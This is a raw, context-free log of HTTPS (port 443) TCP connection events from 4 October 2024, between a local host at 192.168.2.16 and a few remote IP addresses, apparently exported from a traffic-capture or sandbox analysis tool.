                                                                                                        Oct 4, 2024 15:11:23.698854923 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.833810091 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.833851099 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:23.833946943 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.834256887 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:23.834273100 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.135808945 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.136564970 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.136574030 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.136919022 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.137269020 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.137336969 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.137649059 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.146325111 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.146969080 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.146989107 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.147311926 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.152955055 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.153037071 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.153103113 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.179398060 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.192342043 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.199412107 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.279608011 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.279700041 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.279783010 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.280546904 CEST49726443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.280560017 CEST44349726104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.290229082 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.290585995 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.290599108 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.290946007 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.291328907 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.291405916 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.291557074 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.291696072 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.291721106 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292468071 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292521000 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292560101 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292598963 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292603970 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.292619944 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292638063 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.292876959 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.292937994 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.292947054 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.293239117 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.293404102 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.293411970 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.293589115 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.293661118 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.293672085 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.298631907 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.298749924 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.298763990 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.304100990 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.304141045 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.304239035 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.305071115 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.305085897 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.350455046 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.383790970 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.383883953 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.383966923 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.383994102 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384416103 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384454012 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384471893 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.384480000 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384777069 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384795904 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.384802103 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.384841919 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.384898901 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.385471106 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.385637999 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.385646105 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.385653973 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.385889053 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.385898113 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386020899 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386162043 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.386166096 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386177063 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386236906 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386257887 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.386264086 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386307955 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.386308908 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386317968 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386379004 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.386382103 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386390924 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.386730909 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.387677908 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.430392027 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.430411100 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.470175982 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.470222950 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.470241070 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.470256090 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.470372915 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.470379114 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.470841885 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471296072 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471865892 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471878052 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471880913 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471908092 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471935034 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.471952915 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.471966028 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.471987963 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.471987963 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.471995115 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.472331047 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.472358942 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.472382069 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.472388029 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.472440958 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.472481012 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.472487926 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.473026991 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.473350048 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.473404884 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.473468065 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.473474979 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.473515987 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.474018097 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.474060059 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.474085093 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.474090099 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.474103928 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.475142002 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.475243092 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.475250006 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.475403070 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.476140022 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.476193905 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.476201057 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.476263046 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.477040052 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.477097034 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.477102995 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.477164030 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.478082895 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.478121042 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.478133917 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.478140116 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.478163004 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.478230953 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.479027033 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.479091883 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.480057001 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.480114937 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.480541945 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.480607033 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.480613947 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.526693106 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.557558060 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.558737040 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.558770895 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.558880091 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.558888912 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.559309006 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.559372902 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.559377909 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.559442997 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.559447050 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560205936 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560240984 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560261965 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.560269117 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560391903 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.560398102 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560688019 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.560842991 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.561153889 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.561192036 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.561209917 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.561232090 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.561244965 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.561502934 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.562441111 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.562469959 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.562505960 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.562511921 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.562530041 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.562553883 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.563079119 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.563081026 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.563138962 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.563150883 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.563209057 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.563769102 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.563769102 CEST49727443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.563781977 CEST44349727104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564217091 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564270020 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564393997 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.564400911 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564734936 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564770937 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564786911 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.564793110 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.564846992 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.602485895 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.602996111 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:24.603013039 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.603370905 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.604068995 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:24.604144096 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.604262114 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:24.605376005 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.605386019 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.646672964 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.646708012 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.646759987 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.646771908 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.646979094 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.651408911 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.654244900 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:24.654628992 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.661514997 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.661526918 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.661643028 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.661659956 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.670023918 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.670073986 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.670103073 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.670114040 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.670281887 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.681370974 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.681463003 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.681478024 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.681653976 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.682374001 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.682382107 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.682451010 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.693104029 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.693115950 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.693206072 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.703561068 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.703681946 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.713258982 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.713378906 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.722042084 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.722115993 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.732795000 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.732856035 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.732902050 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.732902050 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.732914925 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.742609024 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.742872953 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.742882967 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.743082047 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.752372026 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.752496958 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.762248039 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.762335062 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.771451950 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.771712065 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.781303883 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.781511068 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.795228004 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.795404911 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.804625034 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.805545092 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.810491085 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.810786009 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.814111948 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.814276934 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.821168900 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.822056055 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.829976082 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.830046892 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.831212044 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.831419945 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.832285881 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.832386017 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.832392931 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.832427025 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.832525015 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.832525015 CEST49729443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.835284948 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.835328102 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.835547924 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.835894108 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:24.835905075 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.935983896 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.936321974 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.936332941 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.937501907 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.937588930 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.939713955 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.939874887 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.940054893 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:24.940059900 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:24.982701063 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:25.046286106 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.046340942 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.046629906 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.046871901 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.046890020 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.048171043 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.048640013 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.048896074 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:25.050224066 CEST49732443192.168.2.16104.78.188.188
                                                                                                        Oct 4, 2024 15:11:25.050241947 CEST44349732104.78.188.188192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.145390034 CEST49729443192.168.2.16104.18.94.41
